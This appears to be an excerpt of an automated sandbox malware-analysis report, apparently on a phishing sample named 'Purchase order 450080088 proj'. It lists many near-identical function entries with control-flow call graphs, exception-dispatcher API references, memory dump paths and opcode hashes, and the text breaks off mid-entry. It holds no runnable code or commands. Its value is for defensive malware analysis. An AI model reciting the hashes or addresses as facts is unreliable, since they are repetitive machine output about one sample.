                                                  control_flow_graph 167 5bf7963-5bf7987 call 5bf5a68 call 5bf5bf8 313 5bf7987 call 64b57d0 167->313 314 5bf7987 call 64b5830 167->314 173 5bf798d-5bf79cc 315 5bf79cc call 64b6451 173->315 316 5bf79cc call 64b63f0 173->316 317 5bf79cc call 64b6020 173->317 176 5bf79d2-5bf7a11 318 5bf7a11 call 64b7708 176->318 319 5bf7a11 call 64b7258 176->319 320 5bf7a11 call 64b7268 176->320 321 5bf7a11 call 64b6b53 176->321 322 5bf7a11 call 64b6b60 176->322 323 5bf7a11 call 64b7316 176->323 179 5bf7a17-5bf7a56 324 5bf7a56 call 64b79ef 179->324 325 5bf7a56 call 64b7a53 179->325 326 5bf7a56 call 64b7933 179->326 327 5bf7a56 call 64b7990 179->327 182 5bf7a5c-5bf7a9b 328 5bf7a9b call 64b7a53 182->328 329 5bf7a9b call 64b7ab0 182->329 185 5bf7aa1-5bf7ae0 330 5bf7ae0 call 64b8212 185->330 331 5bf7ae0 call 64b84c0 185->331 332 5bf7ae0 call 64b8520 185->332 333 5bf7ae0 call 64b8210 185->333 188 5bf7ae6-5bf7b25 334 5bf7b25 call 64b9a98 188->334 335 5bf7b25 call 64b9a96 188->335 191 5bf7b2b-5bf8606 KiUserExceptionDispatcher * 2 310 5bf860c-5bf864f 191->310 313->173 314->173 315->176 316->176 317->176 318->179 319->179 320->179 321->179 322->179 323->179 324->182 325->182 326->182 327->182 328->185 329->185 330->188 331->188 332->188 333->188 334->191 335->191
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 7fe37894a4f38855bf4f1fa045b30da9509066a1f1565a49b3bb409466dfc12e
                                                  • Instruction ID: b9d0753e495fa5ce904663420b6888fdbd0680cf7dd9f3a03b45d54390d65837
                                                  • Opcode Fuzzy Hash: 7fe37894a4f38855bf4f1fa045b30da9509066a1f1565a49b3bb409466dfc12e
                                                  • Instruction Fuzzy Hash: 9402F33890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7942 Relevance: 3.3, APIs: 2, Instructions: 347COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 5bf7942-5bf7987 144 5bf7987 call 64b57d0 0->144 145 5bf7987 call 64b5830 0->145 4 5bf798d-5bf79cc 146 5bf79cc call 64b6451 4->146 147 5bf79cc call 64b63f0 4->147 148 5bf79cc call 64b6020 4->148 7 5bf79d2-5bf7a11 149 5bf7a11 call 64b7708 7->149 150 5bf7a11 call 64b7258 7->150 151 5bf7a11 call 64b7268 7->151 152 5bf7a11 call 64b6b53 7->152 153 5bf7a11 call 64b6b60 7->153 154 5bf7a11 call 64b7316 7->154 10 5bf7a17-5bf7a56 155 5bf7a56 call 64b79ef 10->155 156 5bf7a56 call 64b7a53 10->156 157 5bf7a56 call 64b7933 10->157 158 5bf7a56 call 64b7990 10->158 13 5bf7a5c-5bf7a9b 159 5bf7a9b call 64b7a53 13->159 160 5bf7a9b call 64b7ab0 13->160 16 5bf7aa1-5bf7ae0 161 5bf7ae0 call 64b8212 16->161 162 5bf7ae0 call 64b84c0 16->162 163 5bf7ae0 call 64b8520 16->163 164 5bf7ae0 call 64b8210 16->164 19 5bf7ae6-5bf7b25 165 5bf7b25 call 64b9a98 19->165 166 5bf7b25 call 64b9a96 19->166 22 5bf7b2b-5bf8606 KiUserExceptionDispatcher * 2 141 5bf860c-5bf864f 22->141 144->4 145->4 146->7 147->7 148->7 149->10 150->10 151->10 152->10 153->10 154->10 155->13 156->13 157->13 158->13 159->16 160->16 161->19 162->19 163->19 164->19 165->22 166->22
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 6222b5ed1852924ea1f8e45281d4db7f6c9a4ead3309d0d90c4dfcc7a8b6b867
                                                  • Instruction ID: e9f41e7b1bf13323b8ca8e9263bc269bcb2292d41e744dcb4f83350de54e807b
                                                  • Opcode Fuzzy Hash: 6222b5ed1852924ea1f8e45281d4db7f6c9a4ead3309d0d90c4dfcc7a8b6b867
                                                  • Instruction Fuzzy Hash: 2C02033890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF79A8 Relevance: 3.3, APIs: 2, Instructions: 340COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 336 5bf79a8-5bf79cc call 5bf5a68 call 5bf5bf8 491 5bf79cc call 64b6451 336->491 492 5bf79cc call 64b63f0 336->492 493 5bf79cc call 64b6020 336->493 342 5bf79d2-5bf7a11 494 5bf7a11 call 64b7708 342->494 495 5bf7a11 call 64b7258 342->495 496 5bf7a11 call 64b7268 342->496 497 5bf7a11 call 64b6b53 342->497 498 5bf7a11 call 64b6b60 342->498 499 5bf7a11 call 64b7316 342->499 345 5bf7a17-5bf7a56 479 5bf7a56 call 64b79ef 345->479 480 5bf7a56 call 64b7a53 345->480 481 5bf7a56 call 64b7933 345->481 482 5bf7a56 call 64b7990 345->482 348 5bf7a5c-5bf7a9b 483 5bf7a9b call 64b7a53 348->483 484 5bf7a9b call 64b7ab0 348->484 351 5bf7aa1-5bf7ae0 485 5bf7ae0 call 64b8212 351->485 486 5bf7ae0 call 64b84c0 351->486 487 5bf7ae0 call 64b8520 351->487 488 5bf7ae0 call 64b8210 351->488 354 5bf7ae6-5bf7b25 489 5bf7b25 call 64b9a98 354->489 490 5bf7b25 call 64b9a96 354->490 357 5bf7b2b-5bf8606 KiUserExceptionDispatcher * 2 476 5bf860c-5bf864f 357->476 479->348 480->348 481->348 482->348 483->351 484->351 485->354 486->354 487->354 488->354 489->357 490->357 491->342 492->342 493->342 494->345 495->345 496->345 497->345 498->345 499->345
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 0b14a850d4085215de38734efbe90170d62737c850f0a0e1aa5a51ca0d2101e5
                                                  • Instruction ID: 346d4b1e432a1ba904e7eb9d1939df70ed5e5d5bbadb3b048c0a2a7106264d57
                                                  • Opcode Fuzzy Hash: 0b14a850d4085215de38734efbe90170d62737c850f0a0e1aa5a51ca0d2101e5
                                                  • Instruction Fuzzy Hash: 3502133890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF79ED Relevance: 3.3, APIs: 2, Instructions: 333COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 500 5bf79ed-5bf7a11 call 5bf5a68 call 5bf5bf8 640 5bf7a11 call 64b7708 500->640 641 5bf7a11 call 64b7258 500->641 642 5bf7a11 call 64b7268 500->642 643 5bf7a11 call 64b6b53 500->643 644 5bf7a11 call 64b6b60 500->644 645 5bf7a11 call 64b7316 500->645 506 5bf7a17-5bf7a56 646 5bf7a56 call 64b79ef 506->646 647 5bf7a56 call 64b7a53 506->647 648 5bf7a56 call 64b7933 506->648 649 5bf7a56 call 64b7990 506->649 509 5bf7a5c-5bf7a9b 650 5bf7a9b call 64b7a53 509->650 651 5bf7a9b call 64b7ab0 509->651 512 5bf7aa1-5bf7ae0 652 5bf7ae0 call 64b8212 512->652 653 5bf7ae0 call 64b84c0 512->653 654 5bf7ae0 call 64b8520 512->654 655 5bf7ae0 call 64b8210 512->655 515 5bf7ae6-5bf7b25 656 5bf7b25 call 64b9a98 515->656 657 5bf7b25 call 64b9a96 515->657 518 5bf7b2b-5bf8606 KiUserExceptionDispatcher * 2 637 5bf860c-5bf864f 518->637 640->506 641->506 642->506 643->506 644->506 645->506 646->509 647->509 648->509 649->509 650->512 651->512 652->515 653->515 654->515 655->515 656->518 657->518
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 3030f632361f7b956039142f0eec4c0bcae33f586a4ca208d58591735ed3b7da
                                                  • Instruction ID: cb6152d4055a1f40183a3970b5e00b2d25f618e881f1b5f7986c22ee1bb4a1e6
                                                  • Opcode Fuzzy Hash: 3030f632361f7b956039142f0eec4c0bcae33f586a4ca208d58591735ed3b7da
                                                  • Instruction Fuzzy Hash: 1202F33890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7A32 Relevance: 3.3, APIs: 2, Instructions: 326COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 658 5bf7a32-5bf7a56 call 5bf5a68 call 5bf5bf8 795 5bf7a56 call 64b79ef 658->795 796 5bf7a56 call 64b7a53 658->796 797 5bf7a56 call 64b7933 658->797 798 5bf7a56 call 64b7990 658->798 664 5bf7a5c-5bf7a9b 799 5bf7a9b call 64b7a53 664->799 800 5bf7a9b call 64b7ab0 664->800 667 5bf7aa1-5bf7ae0 801 5bf7ae0 call 64b8212 667->801 802 5bf7ae0 call 64b84c0 667->802 803 5bf7ae0 call 64b8520 667->803 804 5bf7ae0 call 64b8210 667->804 670 5bf7ae6-5bf7b25 805 5bf7b25 call 64b9a98 670->805 806 5bf7b25 call 64b9a96 670->806 673 5bf7b2b-5bf8606 KiUserExceptionDispatcher * 2 792 5bf860c-5bf864f 673->792 795->664 796->664 797->664 798->664 799->667 800->667 801->670 802->670 803->670 804->670 805->673 806->673
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 42f97eaa76aa2c3dfbe9ec71f28bc74feead87459934e4f2ff0f868ecd55b8bc
                                                  • Instruction ID: ceb15241c5214d96a04c3cf603510e23f65cd831a26a9841112b805159ca767c
                                                  • Opcode Fuzzy Hash: 42f97eaa76aa2c3dfbe9ec71f28bc74feead87459934e4f2ff0f868ecd55b8bc
                                                  • Instruction Fuzzy Hash: 1802E43890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7A77 Relevance: 3.3, APIs: 2, Instructions: 319COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 807 5bf7a77-5bf7a9b call 5bf5a68 call 5bf5bf8 941 5bf7a9b call 64b7a53 807->941 942 5bf7a9b call 64b7ab0 807->942 813 5bf7aa1-5bf7ae0 943 5bf7ae0 call 64b8212 813->943 944 5bf7ae0 call 64b84c0 813->944 945 5bf7ae0 call 64b8520 813->945 946 5bf7ae0 call 64b8210 813->946 816 5bf7ae6-5bf7b25 947 5bf7b25 call 64b9a98 816->947 948 5bf7b25 call 64b9a96 816->948 819 5bf7b2b-5bf8606 KiUserExceptionDispatcher * 2 938 5bf860c-5bf864f 819->938 941->813 942->813 943->816 944->816 945->816 946->816 947->819 948->819
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 4f465dd6f6e57494f2002796c52328fdc60d87268c2bd8960d17bffb7a8ec587
                                                  • Instruction ID: 1245b8ce8461e1aa4c5551902c9ab0ad714c6139f55c0283305553a4ce6168ed
                                                  • Opcode Fuzzy Hash: 4f465dd6f6e57494f2002796c52328fdc60d87268c2bd8960d17bffb7a8ec587
                                                  • Instruction Fuzzy Hash: BCF1E33890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7ABC Relevance: 3.3, APIs: 2, Instructions: 312COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 949 5bf7abc-5bf7ae0 call 5bf5a68 call 5bf5bf8 1080 5bf7ae0 call 64b8212 949->1080 1081 5bf7ae0 call 64b84c0 949->1081 1082 5bf7ae0 call 64b8520 949->1082 1083 5bf7ae0 call 64b8210 949->1083 955 5bf7ae6-5bf7b25 1084 5bf7b25 call 64b9a98 955->1084 1085 5bf7b25 call 64b9a96 955->1085 958 5bf7b2b-5bf8606 KiUserExceptionDispatcher * 2 1077 5bf860c-5bf864f 958->1077 1080->955 1081->955 1082->955 1083->955 1084->958 1085->958
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: ebefaa866da31cbd3792c40b0bb209c4e905dc1bd5a4c34e5902276addc0aba0
                                                  • Instruction ID: 85b4761cd10ff6167ebe95dd386882625eceb97f634ca761230aeacce70e3925
                                                  • Opcode Fuzzy Hash: ebefaa866da31cbd3792c40b0bb209c4e905dc1bd5a4c34e5902276addc0aba0
                                                  • Instruction Fuzzy Hash: CDF1F23890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7B01 Relevance: 3.3, APIs: 2, Instructions: 305COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1086 5bf7b01-5bf7b25 call 5bf5a68 call 5bf5bf8 1214 5bf7b25 call 64b9a98 1086->1214 1215 5bf7b25 call 64b9a96 1086->1215 1092 5bf7b2b-5bf8606 KiUserExceptionDispatcher * 2 1211 5bf860c-5bf864f 1092->1211 1214->1092 1215->1092
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: ae0a29769ad9f868b79d37df964db310055e2edebce99ec9bd599e4ab7c20c5a
                                                  • Instruction ID: 7ea640ec335060b5b25b4f1a614110d143ad9a4c727af7914507f335e5bf416f
                                                  • Opcode Fuzzy Hash: ae0a29769ad9f868b79d37df964db310055e2edebce99ec9bd599e4ab7c20c5a
                                                  • Instruction Fuzzy Hash: 8DF1E33890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7B46 Relevance: 3.3, APIs: 2, Instructions: 298COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 7c1aa6aa3dbc546e35260b08c9ed53d157ad9f5039e168712ab3bc70de7ae1a2
                                                  • Instruction ID: b70976f24619038c8402781e691ecd9d1335db1af58fa05a21ab7bc99674367f
                                                  • Opcode Fuzzy Hash: 7c1aa6aa3dbc546e35260b08c9ed53d157ad9f5039e168712ab3bc70de7ae1a2
                                                  • Instruction Fuzzy Hash: 95F1E43890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7B8B Relevance: 3.3, APIs: 2, Instructions: 291COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 31d9df14dde6a42c804199b092f0f6a9102fb1802028953864e17c20271be05e
                                                  • Instruction ID: e91c0281e34309a08fefa1171423889f006385b026638cbd4068ac803b179032
                                                  • Opcode Fuzzy Hash: 31d9df14dde6a42c804199b092f0f6a9102fb1802028953864e17c20271be05e
                                                  • Instruction Fuzzy Hash: 73E1F43890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7BD0 Relevance: 3.3, APIs: 2, Instructions: 284COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 8ce95b1b3b40ad315fa8cfcc0699cbc2214920ec6b66593a7966539cd6155dfa
                                                  • Instruction ID: 9c2e0f8c51f7d246bd5f30fef2ac8d101819a58484b69ba63236cacfd2031ee1
                                                  • Opcode Fuzzy Hash: 8ce95b1b3b40ad315fa8cfcc0699cbc2214920ec6b66593a7966539cd6155dfa
                                                  • Instruction Fuzzy Hash: 24E1043890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB756E95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7C15 Relevance: 3.3, APIs: 2, Instructions: 277COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 195b11218d8210781763a011ae1655a8c8c7d28a29c30a9c15ad57cdd09210f2
                                                  • Instruction ID: 6151807c63216577314c68d4a8ac6dee3b0ab810c7207401f2989ab995299ef9
                                                  • Opcode Fuzzy Hash: 195b11218d8210781763a011ae1655a8c8c7d28a29c30a9c15ad57cdd09210f2
                                                  • Instruction Fuzzy Hash: 8DE1F43890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7C5A Relevance: 3.3, APIs: 2, Instructions: 270COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 54e849f5bdfa811bc8564bf3c327f159e3dd20e4e791e067768009b9c4ceb80e
                                                  • Instruction ID: 738643d8d30c226a6306fe5e55dc16b720d904a6076bdbc7f61b38776019dc8a
                                                  • Opcode Fuzzy Hash: 54e849f5bdfa811bc8564bf3c327f159e3dd20e4e791e067768009b9c4ceb80e
                                                  • Instruction Fuzzy Hash: 92E1F43890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7C9F Relevance: 3.3, APIs: 2, Instructions: 263COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 7e2a719f12aeb6c99ec39e9972813bd3703a99a4b89c35cb90b067bbe6284408
                                                  • Instruction ID: b9a76e2e7acaf3e36d785c03e7ee2f1bd9f205c3222cf54c6c38a932affeed19
                                                  • Opcode Fuzzy Hash: 7e2a719f12aeb6c99ec39e9972813bd3703a99a4b89c35cb90b067bbe6284408
                                                  • Instruction Fuzzy Hash: 39D1F33890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7CE4 Relevance: 3.3, APIs: 2, Instructions: 256COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 037a8eccf677ec5aa62d6855dbb6bc02ecf879fcbff977a832c759f4c19763d5
                                                  • Instruction ID: 17868822077aa422101d689f8b8399420d88e24ffea95d27af125a6b52c36b85
                                                  • Opcode Fuzzy Hash: 037a8eccf677ec5aa62d6855dbb6bc02ecf879fcbff977a832c759f4c19763d5
                                                  • Instruction Fuzzy Hash: 03D1033890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7D29 Relevance: 3.2, APIs: 2, Instructions: 249COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: e50c9294c07f712142f445ec09ed0c94a0e6a0637751c519b54387a521421189
                                                  • Instruction ID: 9c1dfd135fe2b7d077dabf83f4e62976fe39ac1674ff89441746e8d54ef079f7
                                                  • Opcode Fuzzy Hash: e50c9294c07f712142f445ec09ed0c94a0e6a0637751c519b54387a521421189
                                                  • Instruction Fuzzy Hash: 8ED1E33890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7D6E Relevance: 3.2, APIs: 2, Instructions: 242COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 8c17e71b0894808f5573804d11bdad0427be1e7c1c0dd535da8260483d1fce97
                                                  • Instruction ID: e52436639158a64801bc8a49ffabe6a23e384de764ab209dd8cc4b3a323eac5c
                                                  • Opcode Fuzzy Hash: 8c17e71b0894808f5573804d11bdad0427be1e7c1c0dd535da8260483d1fce97
                                                  • Instruction Fuzzy Hash: 74C1F43890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB756E95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7DB3 Relevance: 3.2, APIs: 2, Instructions: 235COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
